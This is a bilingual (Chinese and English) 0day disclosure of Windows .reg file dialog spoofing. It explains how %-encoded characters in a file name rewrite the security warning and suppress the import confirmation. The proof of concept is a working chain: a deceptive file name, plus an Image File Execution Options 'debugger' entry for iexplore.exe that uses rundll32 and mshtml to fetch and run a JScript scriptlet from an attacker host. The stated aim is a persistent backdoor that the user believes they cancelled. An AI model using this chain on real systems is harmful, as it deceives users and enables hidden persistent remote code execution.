Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

Microsoft Windows .Reg文件对话框消息欺骗 0day

概述

　　扩展名为.reg的文件是Windows注册表中使用的注册文件。这些文件可以包含hives、密钥和值。.reg文件可以在文本编辑器中新建，也可以由Windows注册表在备份注册表时生成。

漏洞类型

reg文件对话框消息欺骗

CVE编号

N/A

安全问题

　　Windows注册表编辑器允许自定义.reg文件名来欺骗并展现给终端用户的默认注册表的警告对话框。这可能会诱使部分不懂（小白）的用户选择对话框中显示的错误选项。此外，我们可以拒绝注册表编辑器显示缺省辅助状态对话框(Win 10)的功能，从而隐藏我们的攻击。

　　通常，当用户打开一个.reg文件时，UAC将启动(如果用户以管理员身份运行)，如果目标是一个非私有用户，我们仍然可以劫持HKCU reg设置，而不需要处理UAC。在他们得到注册表安全警告对话框询问他们是否“信任源”和“您确定要继续吗?”等，并将有“是”或“否”的选择。

　　但是，我们可以通过文件名传入我们自己的消息，诱使用户错误地单击“是”，正如预期的“您确定要继续吗?”对话框消息在我们的控制之下。注册表对话框将回显文件名和我们添加的所有文本，并允许我们屏蔽其一部分默认的安全警告消息。我们使用文件名中的%编码字符(如%n或%r和%0)来实现这一点。

　　例如，“不要将其添加到注册表”和“确定要继续吗?”这一类默认的警告可以使用%0来截断。

　　这个欺骗漏洞让我们可以欺骗“您确定要继续吗?”警告消息改为“单击确定”或其他我们喜欢的内容。可能会让用户认为他们正在取消注册表导入。

在Windows 10中拒绝二级注册表编辑器状态对话框(隐藏攻击):

-----------------------------

　　通常，在成功导入之后，注册表编辑器会弹出另一个对话框，其中显示一条状态消息，告诉我们“<REGFILE>中包含的键和值已成功添加到注册表中”。

　　我们可以使用%1或%25在文件名的末尾加上一个(null)，比如:“Microsoft-Security-Update-v1.2-Windows-10.r%e%g% nC%l%i%c%k%b%Y%e% b%b%b%1%0.reg”，来阻止上述的消息出现，从而阻止这个辅助注册表编辑器对话框出现。

　　如果不希望使用(null)，请使用%3，但它将显示一个宽字符，但这仍然可以阻止二级注册表对话框出现。在使用这些对话框拒绝服务方法时，必须手动刷新写入的注册表，以便查看存储的值。

　　注意:拒绝二级对话框似乎只适用于Windows 10。

　　本次发现的使用注册表文件名影响对话框的行为，取决于Windows版本，不同的操作系统您将得到不同的结果。

编码在文件名中的作用：

% 可用于混淆，如%h%a%t%e =hate

%b 空格

%n 换行

%r 换行

%1创建(null)——这很重要，因为我们可以防止在成功导入之后出现第二个注册表对话框!

%0 重要的截断字符串

%25 (Windows 10)创建(null)-重要的是，我们防止第二个注册表对话框出现后，成功导入!

%3 重要，我们防止第二个注册表对话框出现成功导入!(但会显示宽字符)

%5 (Windows 10)复制默认注册表对话框消息的次数为“n”次，每次将%5注入文件名的次数为“n”次

%25 (Windows 7)复制默认注册表对话框消息的次数为“n”次，每次将%25注入文件名的次数为“n”次

%2525阻止打开注册表编辑器

%169将在对话框中显示我们的junky文件名 (我们不想看到的)

%3、%197、%17等将注册表对话框中显示的默认语言更改为宽字符等

　　每个注入的字符可以用百分号“%”分隔，而不会影响我们欺骗的消息，我们可以利用这一点来混淆文件名的结尾。然后，我们使用%0截断消息字符串，以便第二个.reg扩展名和缺省注册表消息不会显示在注册表对话框中。

　　文件名“Microsoft-Security-Update-v1.2 - Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg将显示为“Microsoft-Security-Update-v1.2-Windows-10”。注册表对话框中的“reg”，以及我们欺骗的用户引导文字。

　　虽然这个欺骗漏洞需要用户交互和绕过Windows UAC(如果目标是管理员)提示符才能成功，但是我们可以防止二级注册表对话框并修改显示给用户的注册表消息，这使得它成为一个可行的攻击载体。如果我们攻击成功，就可以在用户认为他们已经中止导入的同时实现一个持久的RCE后门。此外，针对非特权用户允许我们劫持程序，而不用担心UAC。

POC视频URL

https://vimeo.com/322684636

Exploit/POC
持久远程代码执行后门:

这将向“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe”添加条目。

对于一个针对ie浏览器的持久rundll32有效负载，它引用了基于远程服务器的JScript XML文件。

1) 创建一个名为Windows.reg的注册表文件，写入以下内容。

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<;ATTACKER-IP>/backdoor\")"

2) 创建一个位于http://attackerip/backdoor的XML文件，该文件的名称简单地称为“backdoor”，将在Microsoft Internet Explorer启动时执行Windows calc.exe。

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
</component>
</package>

--------------------

[Product]
A file with the .reg file extension is a Registration file
used by the Windows registry. These files can contain hives, keys, and
values.
.reg files can be created from scratch in a text editor or
can be produced by the Windows registry when backing up parts of the
registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The
Windows registry editor allows specially crafted .reg filenames to
spoof the default registry dialog warning box presented to an end user. This
can potentially trick unsavvy users into choosing the wrong selection
shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally
when a user opens a .reg file UAC will launch (if user is run as Admin)
if targeting a non privleged user we can still hijack HKCU reg settings without
having to deal with UAC. After they will get the registry security
warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from.

However,
we can inject our own messages thru the filename to direct the user to
wrongly click "Yes", as the expected "Are you sure you want to
continue?" dialog box message is under our control. The registry
dialog echoes back the filename plus any text we add and allows us to
terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.

Example,
the "do not add it to the registry" and "Are you sure you want to
continue?" default warning messages can be done away with using %0.

This
spoofing flaw lets us spoof the "Are you sure you want to continue?"
warning message to instead read "Click Yes" or whatever else we like.Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
------------------------------------------------------------------------------------------------
Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in <REGFILE> have been successfully added to the registry".

We
can obstruct that behavior to deny this secondary registry editor
dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If
don't want to use (null) use %3 but it will display a asian char
instead but still prevents the secondary registry dialog box you.You
will have to manually refresh the registry written to in order to see
the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors
I discovered playing with registry filenames that affect the dialog
box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)
%5
(Windows 10) duplicates the default registry dialog box message by "n"
amount of times per amount of %5 injected into the filename
%25
(Windows 7) duplicates the default registry dialog box message by "n"
amount of times per amount of %25 injected into the filename
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc

Each
injected character can be separated by a percent "%" sign without
messing up our spoofed message, we can leverage this to obfuscate the
end of the filename.We then use %0 to terminate the message string
so that the second .reg extension and default registry messages are not
displayed in the registry dialog box.

The filename
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
will show as "Microsoft-Security-Update-v1.2-Windows-10.reg" in the registry dialog box, along with our spoofed user directions.

While
this spoofing vulnerability requires user interaction and bypassing
Windows UAC (if targeting Admin) prompt to succeed, the fact the we can
prevent secondary registry dialogs and modify registry messages
displayed to the user makes it a viable attack vector. If we are
successful in our attack we can achieve a persistent RCE backdoor all
while the user thinks they have aborted the import. Moreover, targeting
a non privileged user allows us to hijack programs and not worry about
UAC.

[POC Video URL]
https://vimeo.com/322684636

[Exploit/POC]
Persistent Remote Code Execution Backdoor:

This
will add entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\iexplore.exe" for a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.

1) Create a Windows .REG Registry file named.

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<;ATTACKER-IP>/backdoor\")"

2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as "backdoor" will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>